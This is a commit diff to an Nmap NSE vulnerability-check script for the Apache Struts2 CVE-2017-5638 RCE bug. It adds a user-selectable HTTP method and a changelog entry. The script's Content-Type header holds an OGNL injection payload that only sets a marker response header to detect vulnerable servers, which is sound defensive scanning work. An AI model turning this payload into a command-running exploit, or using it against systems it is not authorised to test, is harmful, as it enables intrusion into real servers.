Adds support for user-selectable HTTP method. Closes #759

CHANGELOG

@@ -19,8 +19,8 @@ o [Ncat][GH#157] Ncat will now continue trying to connect to each resolved
 o [NSE][GH#743] New script broadcast-ospf2-discover discovers OSPF 2 routers
   and neighbors. OSPFv2 authentication is supported. [Emiliano Ticci]
 
-o [NSE][GH#740] New script http-vuln-cve2017-5638 checks for the RCE bug in
-  Apache Struts. [Seth Jackson]
+o [NSE][GH#740][GH#759] New script http-vuln-cve2017-5638 checks for the RCE
+  bug in Apache Struts2. [Seth Jackson]
 
 o [NSE] Added several commands to redis-info to extract listening addresses,
   connected clients, active channels, and cluster nodes. [Vasiliy Kulikov]

scripts/http-vuln-cve2017-5638.nse

@@ -28,6 +28,7 @@ local string = require "string"
 -- |       https://cwiki.apache.org/confluence/display/WW/S2-045
 -- |_      http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
 --
+-- @args http-vuln-cve2017-5638.method The HTTP method for the request. The default method is "GET".
 -- @args http-vuln-cve2017-5638.path The URL path to request. The default path is "/".
 
 author = "Seth Jackson"
@@ -58,6 +59,7 @@ vulnerability via the Content-Type header.
 
     local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
 
+    local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "GET"
     local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/"
     local value = stdnse.generate_random_string(8)
 
@@ -65,7 +67,7 @@ vulnerability via the Content-Type header.
         ["Content-Type"] = string.format("%%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts', '%s')}.multipart/form-data", value)
     }
 
-    local response = http.post(host, port, path, { header = header })
+    local response = http.generic_request(host, port, method, path, { header = header })
 
     if response and response.status == 200 and response.header["x-check-struts"] == value then
         vuln.state = vulns.STATE.VULN